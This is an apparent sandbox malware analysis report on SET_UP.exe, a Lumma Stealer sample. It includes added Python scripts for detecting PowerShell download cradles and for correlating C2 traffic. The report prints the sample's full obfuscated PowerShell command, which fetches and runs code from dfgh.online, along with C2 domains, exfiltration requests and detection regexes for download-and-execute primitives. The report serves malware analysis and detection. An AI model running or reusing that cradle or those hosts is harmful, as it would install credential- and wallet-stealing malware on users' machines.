
Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name: SET_UP.exe
Analysis ID: 1585349
MD5: 0f91b9310e783c23ada7d4c31c89be4b
SHA1: 5fd4b60f7b500744b8fbd260df03172effde1be1
SHA256: f5413e2c9c6dead8cef37abe15a25e8aa16aca8582116079211e66400e960687
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SET_UP.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 0F91B9310E783C23ADA7D4C31C89BE4B)
    • powershell.exe (PID: 7616 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Malware configuration (LummaC): {"C2 url": ["wholersorie.shop", "abruptyopsn.shop", "tirepublicerj.shop", "skinfuzzerz.cyou", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}
Yara matches (network capture):
Source: sslproxydump.pcap; Rule: JoeSecurity_LummaCStealer_3; Description: Yara detected LummaC Stealer; Author: Joe Security
Source: sslproxydump.pcap; Rule: JoeSecurity_LummaCStealer_2; Description: Yara detected LummaC Stealer; Author: Joe Security

Yara matches (memory):
Source: 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Donutloader_f40e3759; Description: unknown; Author: unknown; Strings: 0x541ff:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Source: 00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 00000000.00000003.1946741383.0000000000908000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: Process Memory Space: SET_UP.exe PID: 7268; Rule: JoeSecurity_LummaCStealer_3; Description: Yara detected LummaC Stealer; Author: Joe Security
Source: Process Memory Space: SET_UP.exe PID: 7268; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security

              System Summary

Sigma rule matches (Source: Process started). Six rules matched the same PowerShell child process; the rule authors are:
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • frack113
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Matched event data (identical for all six matches):
  Command / CommandLine / ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
  CommandLine|base64offset|contains: ^
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe"
  ParentImage: C:\Users\user\Desktop\SET_UP.exe
  ParentProcessId: 7268
  ParentProcessName: SET_UP.exe
  ProcessId: 7616
  ProcessName: powershell.exe
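All six Sigma matches above fire on one command line, which combines every component of a classic download cradle: an execution-policy bypass, Invoke-WebRequest under its iWr alias, Invoke-Expression as IEx, a forced TLS 1.2 setting, and randomised letter casing on every long token so that case-sensitive string matches miss it. The Python below is an added example, not code from the Joe Sandbox report, showing the detection logic a SOC would run over process-creation events: case-insensitive checks for each cradle component, plus a simple case-mixing score that flags randomised casing on its own. The events are constructed; the first reproduces the command line recorded for PID 7616, the other two are hypothetical benign and malicious controls.

```python
"""Flag obfuscated PowerShell download-and-execute cradles in process-creation
events. Added example (not Joe Sandbox code); EVENTS is constructed, the first
entry reproducing the command line this report recorded for PID 7616."""
import re

EVENTS = [
    {"pid": 7616, "parent": "SET_UP.exe", "cmd": (
        "powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = "
        "[Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='"
        "+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 "
        "(Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 "
        "Safari/57.36'; IEx $Ptsr.Content;")},
    # hypothetical benign control: a scheduled script with normal casing
    {"pid": 4242, "parent": "svchost.exe",
     "cmd": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},
    # hypothetical malicious control: classic cradle, normal casing, spawned by Word
    {"pid": 4243, "parent": "winword.exe",
     "cmd": "powershell -w hidden -ep bypass -c \"IEX "
            "(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""},
]

# Every check is case-insensitive because PowerShell itself is; randomised casing
# only defeats detections that forgot that.
CHECKS = [
    ("execution_policy_bypass", re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass", re.I)),
    ("web_request_cmdlet", re.compile(
        r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b"
        r"|downloadstring|downloadfile", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("tls_protocol_forced", re.compile(r"servicepointmanager\]::securityprotocol", re.I)),
    ("hostname_in_url", re.compile(r"\$env:computername", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
]

def case_mixing_ratio(cmd):
    """Fraction of consecutive letter pairs whose case differs. Hand-typed commands
    are mostly lower case with a few capitals; 'SEcURiTyPrOtoCOl'-style tokens push
    the ratio well above what normal scripts produce."""
    letters = [c for c in cmd if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips / (len(letters) - 1)

def analyse(event, mixing_threshold=0.3):
    """Return the matched indicators for one event. 'cradle' is set only when a
    fetch primitive and an execute primitive appear together in the same command."""
    cmd = event["cmd"]
    hits = [name for name, rx in CHECKS if rx.search(cmd)]
    ratio = case_mixing_ratio(cmd)
    if ratio > mixing_threshold:
        hits.append("randomised_case")
    cradle = "web_request_cmdlet" in hits and "invoke_expression" in hits
    return {"pid": event["pid"], "parent": event["parent"], "hits": hits,
            "case_mixing": round(ratio, 2), "cradle": cradle}

def urls_in(cmd):
    """Extract stage-two URLs so the responder can block/hunt them immediately."""
    return re.findall(r"https?://[^\s'\"]+", cmd, re.I)

if __name__ == "__main__":
    for ev in EVENTS:
        result = analyse(ev)
        print(f"pid={result['pid']} parent={result['parent']} cradle={result['cradle']} "
              f"case_mixing={result['case_mixing']} hits={result['hits']} urls={urls_in(ev['cmd'])}")
```

The threshold of 0.3 for the case-mixing score is an assumption chosen for these samples; tune it against your own baseline of PowerShell command lines before alerting on it alone. The parent process (SET_UP.exe on the user's Desktop here, an Office binary in the third sample) is the other signal worth joining: a download cradle under a freshly dropped executable or a document handler rarely has a benign explanation.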
Suricata alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T14:48:24.252351+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.268050+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:26.366865+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:28.874636+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:30.089413+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:33.035251+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:34.030662+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:35.004044+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:36.452005+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP
2025-01-07T14:48:24.781192+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.743537+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:35.493784+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:24.781192+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:25.743537+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:28.274178+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP


              AV Detection

Source: https://klipvumisui.shop:443/int_clp_sha.txt; Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtxe; Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/_B; Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtf1; Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/Fi; Avira URL Cloud: Label: malware
Source: https://dfgh.online/; Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txter; Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/;; Avira URL Cloud: Label: malware
Source: SET_UP.exe.7268.0.memstrmin; Malware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "abruptyopsn.shop", "tirepublicerj.shop", "skinfuzzerz.cyou", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.4% probability
Source: SET_UP.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2064103815.0000000007690000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb&/^s& source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZa source: powershell.exe, 00000004.00000002.2064442184.0000000007710000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.2064103815.00000000076A6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbM1 source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SET_UP.exe; Directory queried: number of queries: 1001

              Networking

Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49757 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49751 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49750 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49751 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 188.114.97.3:443
Source: Malware configuration extractor; URLs: wholersorie.shop, abruptyopsn.shop, tirepublicerj.shop, skinfuzzerz.cyou, framekgirus.shop, nearycrepso.shop, cloudewahsj.shop, rabidcowse.shop, noisycuttej.shop
Source: global traffic; TCP traffic: 192.168.2.4:55959 -> 162.159.36.2:53
Source: Joe Sandbox View; IP Address: 188.114.97.3
Source: Joe Sandbox View; IP Address: 185.161.251.21
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4 ports 49750, 49751, 49752, 49753, 49754, 49755, 49756, 49757 -> 188.114.97.3:443, and 192.168.2.4:49758 -> 185.161.251.21:443
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 80 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=R0WF7AGPFE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18116 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=J3TIF90L1DDF8I5WY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8779 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1BP8P7DHDMKP0OSWR | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20432 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9JWW0VJD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1212 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VW51LKHI38YBQKGO44 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1104 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 115 | Host: skinfuzzerz.cyou
Source: global traffic; HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 entries)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 entries)
Source: global traffic; DNS traffic detected: DNS query: skinfuzzerz.cyou
Source: global traffic; DNS traffic detected: DNS query: cegu.shop
Source: global traffic; DNS traffic detected: DNS query: klipvumisui.shop
Source: global traffic; DNS traffic detected: DNS query: dfgh.online
Source: global traffic; DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: unknown; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: skinfuzzerz.cyou
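Of the nine C2 domains in the extracted configuration, only skinfuzzerz.cyou was queried in DNS and contacted in this run; the eight POSTs to /api on that host split into small form-urlencoded requests (8, 80 and 115 bytes, the check-in/beacon exchange) and multipart uploads of up to 20 KB, which is the exfiltration stage the Suricata rule 2048094 fired on; the GET for ph.txt from cegu.shop is a follow-on fetch from a host that is not in the configuration at all. Note also that the User-Agent observed here is a Chrome 119 string, not the "TeslaBrowser/5.5" string in the family description above, so a detection keyed only on that UA would miss this build. The script below is an added example, not Joe Sandbox code: it reconstructs these request heads from the report's HTTP summaries (the bodies were not captured, so Content-Length stands in for upload size), parses each head, classifies it, totals the exfiltrated bytes and compares observed hosts and DNS queries against the configured C2 list.

```python
"""Correlate a stealer's extracted C2 configuration with the traffic it actually
produced. Added example (not Joe Sandbox code). C2_CONFIG, DNS_QUERIES and the
request heads in REQUESTS are reconstructed from this report; the heads are
rebuilt in wire form because that is what an SSL proxy dump yields."""
import re
from collections import defaultdict

C2_CONFIG = ["wholersorie.shop", "abruptyopsn.shop", "tirepublicerj.shop", "skinfuzzerz.cyou",
             "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "rabidcowse.shop",
             "noisycuttej.shop"]
DNS_QUERIES = ["skinfuzzerz.cyou", "cegu.shop", "klipvumisui.shop", "dfgh.online"]
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
FORM = "application/x-www-form-urlencoded"

def _req(method, path, host, length=None, ctype=None):
    """Build an HTTP/1.1 request head (CRLF-terminated) from the report's summary."""
    lines = [f"{method} {path} HTTP/1.1", "Connection: Keep-Alive"]
    if ctype:
        lines.append(f"Content-Type: {ctype}")
    lines.append(f"User-Agent: {UA}")
    if length is not None:
        lines.append(f"Content-Length: {length}")
    lines.append(f"Host: {host}")
    return "\r\n".join(lines) + "\r\n\r\n"

REQUESTS = [
    _req("POST", "/api", "skinfuzzerz.cyou", 8, FORM),
    _req("POST", "/api", "skinfuzzerz.cyou", 80, FORM),
    _req("POST", "/api", "skinfuzzerz.cyou", 18116, "multipart/form-data; boundary=R0WF7AGPFE"),
    _req("POST", "/api", "skinfuzzerz.cyou", 8779, "multipart/form-data; boundary=J3TIF90L1DDF8I5WY"),
    _req("POST", "/api", "skinfuzzerz.cyou", 20432, "multipart/form-data; boundary=1BP8P7DHDMKP0OSWR"),
    _req("POST", "/api", "skinfuzzerz.cyou", 1212, "multipart/form-data; boundary=9JWW0VJD"),
    _req("POST", "/api", "skinfuzzerz.cyou", 1104, "multipart/form-data; boundary=VW51LKHI38YBQKGO44"),
    _req("POST", "/api", "skinfuzzerz.cyou", 115, FORM),
    _req("GET", "/8574262446/ph.txt", "cegu.shop"),
]

def parse_head(raw):
    """Parse one request head into method, path and a dict of lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    m = re.match(r"^([A-Z]+)\s+(\S+)\s+HTTP/1\.[01]$", request_line)
    if not m:
        raise ValueError(f"bad request line: {request_line!r}")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m.group(1), "path": m.group(2), "headers": headers}

def classify(req):
    """Label a request by its role: small form-encoded POSTs are the check-in
    exchange, multipart POSTs carry the stolen data, GETs fetch further payloads."""
    ctype = req["headers"].get("content-type", "")
    if req["method"] == "POST" and ctype.startswith("multipart/form-data"):
        return "exfil_upload"
    if req["method"] == "POST" and ctype.startswith(FORM):
        return "beacon"
    if req["method"] == "GET":
        return "payload_fetch"
    return "other"

def triage(requests=REQUESTS, config=C2_CONFIG, dns=DNS_QUERIES):
    """Summarise which configured C2 hosts were used, which never resolved, which
    contacted hosts are outside the configuration, and how much data went out."""
    per_host = defaultdict(lambda: defaultdict(int))
    exfil_bytes = 0
    for raw in requests:
        req = parse_head(raw)
        kind = classify(req)
        host = req["headers"].get("host", "?")
        per_host[host][kind] += 1
        if kind == "exfil_upload":
            exfil_bytes += int(req["headers"]["content-length"])
    return {
        "contacted": [d for d in config if d in per_host],
        "resolved_only": [d for d in config if d in dns and d not in per_host],
        "never_seen": [d for d in config if d not in dns],
        "off_config_hosts": sorted(h for h in per_host if h not in config),
        "exfil_bytes": exfil_bytes,
        "per_host": {h: dict(kinds) for h, kinds in per_host.items()},
    }

if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

The domains listed under never_seen are still worth blocking: the configuration carries them as fallbacks, and a run against a different sandbox or at a later date may land on any of them. Hosts under off_config_hosts (cegu.shop here, and by the same logic klipvumisui.shop and dfgh.online from the DNS log) come from the second-stage script rather than the embedded configuration, so they will not appear in config-extractor feeds and need to be collected from the traffic itself.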
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SET_UP.exe; String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SET_UP.exe; String found in binary or memory: http://crl.starfieldtech.com/repository/0
Source: SET_UP.exe; String found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
Source: SET_UP.exe; String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SET_UP.exe; String found in binary or memory: http://ocsp.starfieldtech.com/0D
Source: SET_UP.exe; String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SET_UP.exe; String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: SET_UP.exe; String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SET_UP.exe; String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: SET_UP.exe; String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: SET_UP.exe; String found in binary or memory: http://sf.symcd.com0&
Source: SET_UP.exe; String found in binary or memory: http://sv.symcb.com/sv.crl0W
Source: SET_UP.exe; String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: SET_UP.exe; String found in binary or memory: http://sv.symcd.com0&
Source: SET_UP.exe; String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SET_UP.exe; String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
